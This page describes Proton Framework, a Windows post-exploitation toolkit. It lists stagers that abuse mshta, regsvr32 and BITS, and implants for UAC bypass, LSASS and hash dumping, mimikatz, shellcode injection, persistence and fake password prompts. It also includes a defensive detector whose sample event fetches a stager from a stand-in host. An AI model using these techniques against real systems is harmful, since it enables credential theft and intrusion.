Proton Framework - A Windows Post Exploitation Framework Similar To Other Penetration Testing Tools Such As Meterpreter And Powershell Invader Framework

About Proton Framework

Proton Framework is a Windows post exploitation framework similar to other penetration 
testing tools such as Meterpreter and Powershell Invader Framework. The major difference is that
the Proton Framework does most of its operations using Windows Script Host (a.k.a. JScript/VBScript),
with compatibility in the core to support a default installation of Windows 2000 with no service
packs (and potentially even versions of NT4) all the way through Windows 10.


Getting started

Proton installation

cd proton

chmod +x install.sh

./install.sh

Proton uninstallation

cd proton

chmod +x uninstall.sh

./uninstall.sh

Proton Framework execution

To start Proton Framework, run the following command:

proton

Proton Framework modules

There are two kinds of Proton Framework modules:
stagers and implants. Proton stagers hook target
zombies and allow you to use implants. Proton
implants start jobs on a remote target zombie.

Proton Framework stagers

Proton Framework stagers hook target 
zombie and allow you to use implants.

| Name | Description |
|------|-------------|
| mshta | Serves payloads using mshta.exe. |
| regsvr | Serves payloads using regsvr32.exe. |
| rundll | Serves payloads using rundll32.exe. |
| disk | Serves payloads using files on disk. |
| bits | Serves payloads using BitsAdmin. |
| wmic | Serves payloads using WMIC XSL. |
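
For defenders, the stager list above maps onto process-creation telemetry: one of the named Windows binaries being handed a remote URL. The following is an added example, not part of Proton or the original page; the event fields (Image, CommandLine, ParentImage) follow Sysmon process-creation events, and the sample events, host names and allow-list are constructed.

```python
import ntpath
import re
from urllib.parse import urlsplit

# Binaries named in the stager table; the "disk" stager has no launcher named on the page.
STAGER_BINARIES = {"mshta.exe": "mshta", "regsvr32.exe": "regsvr", "rundll32.exe": "rundll",
                   "bitsadmin.exe": "bits", "wmic.exe": "wmic"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

def remote_hosts(command_line):
    """Return the lower-cased host of every http(s) URL found in a command line."""
    hosts = []
    for url in URL_RE.findall(command_line):
        try:
            host = urlsplit(url).hostname
        except ValueError:  # malformed URL text, e.g. unbalanced IPv6 brackets
            continue
        if host:
            hosts.append(host.lower())
    return hosts

def flag_stager_launches(events, allowed_hosts=frozenset()):
    """Flag process-creation events where a listed binary is given a non-allow-listed URL."""
    alerts = []
    for ev in events:
        image = ntpath.basename(ev["Image"]).lower()  # image names are case-insensitive
        stager = STAGER_BINARIES.get(image)
        if stager is None:
            continue
        unexpected = [h for h in remote_hosts(ev["CommandLine"]) if h not in allowed_hosts]
        if unexpected:
            alerts.append({"stager": stager, "image": image, "hosts": unexpected,
                           "parent": ntpath.basename(ev["ParentImage"]).lower()})
    return alerts

# Constructed sample events (not captured from Proton); hosts use reserved .test/.example names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\MSHTA.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://stager.test:9999/x"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer job https://updates.corp.example/a.cab C:\Temp\a.cab"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\App\plugin.dll"},
]

if __name__ == "__main__":
    for alert in flag_stager_launches(SAMPLE_EVENTS, allowed_hosts={"updates.corp.example"}):
        print(alert)
```

The allow-list is what keeps legitimate BITS downloads from drowning the alert queue; tune it to the update hosts actually used in your environment.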

Proton Framework implants

Proton Framework implants start
jobs on a remote zombie target.

| Name | Description |
|------|-------------|
| bypassuac_compdefaults | Bypass UAC via registry hijack for ComputerDefaults.exe. |
| bypassuac_compmgmtlauncher | Bypass UAC via registry hijack for CompMgmtLauncher.exe. |
| bypassuac_eventvwr | Uses eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10. |
| bypassuac_fodhelper | Bypass UAC via registry hijack for fodhelper.exe. |
| bypassuac_sdclt | Uses sdclt.exe exploit to bypass UAC on Windows 10. |
| bypassuac_slui | Bypass UAC via registry hijack for slui.exe. |
| system_createservice | Elevate from administrative session to SYSTEM via SC.exe. |
| youtube | Maxes volume and opens the specified YouTube video in a hidden window. |
| voice | Plays a message over text-to-speech. |
| clipboard | Retrieves the current content of the user clipboard. |
| comsvcs_lsass | Utilizes comsvcs.dll to create a MiniDump of LSASS, parses with pypykatz. |
| enum_domain_info | Retrieve information about the Windows domain. |
| hashdump_dc | Domain controller hashes from the NTDS.dit file. |
| hashdump_sam | Retrieves hashed passwords from the SAM hive. |
| loot_finder | Finds loot on the target machine. |
| user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X). |
| mimikatz_dotnet | Injects a reflective-loaded DLL to run powerkatz.dll. |
| mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). |
| mimikatz_tashlib | Executes arbitrary shellcode using the TashLib COM object. |
| shellcode_dotnet | Executes arbitrary shellcode using the DotNet2JS technique. Inject shellcode into a host process via createremotethread as a new thread. |
| shellcode_dynwrapx | Executes arbitrary shellcode using the Dynamic Wrapper X COM object. |
| shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed). |
| enable_rdesktop | Enables remote desktop on the target. |
| exec_cmd | Run an arbitrary command on the target, and optionally receive the output. |
| add_user | Adds either a local or domain user. |
| registry | Adds a Proton stager payload in the registry. |
| schtasks | Establishes persistence via a scheduled task. |
| wmi | Creates persistence using a WMI subscription. |
| password_box | Prompt a user to enter their password. |
| exec_psexec | Run a command on another machine using psexec from sysinternals. |
| exec_wmi | Executes a command on another system. |
| stage_wmi | Hook a zombie on another machine using WMI. |
| tcp | Uses HTTP to scan open TCP ports on the target zombie LAN. |
| download_file | Downloads a file from the target zombie. |
| multi_module | Run a number of implants in succession. |
| upload_file | Uploads a file from the listening server to the target zombies. |

TLS communications

INFO: To enable TLS communications, you will need
to host your Proton stager on a valid domain
(e.g. malicious.com) with a certificate signed by
a known Root CA. Windows will check its certificate
store and will NOT allow a self-signed certificate.

Proton Framework disclaimer

Usage of the Proton Framework for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.
